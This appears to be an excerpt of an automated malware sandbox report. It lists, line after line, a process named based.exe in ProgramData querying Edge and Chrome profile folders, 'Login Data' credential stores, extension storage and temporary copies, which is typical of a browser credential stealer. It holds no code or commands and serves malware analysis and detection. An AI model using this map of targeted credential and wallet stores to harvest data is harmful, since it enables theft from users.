                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gW7E6kPh5L.tmp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gW7E6kPh5L.tmp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\eGGsf5wIUB.tmp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\eGGsf5wIUB.tmp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformationJump to behavior
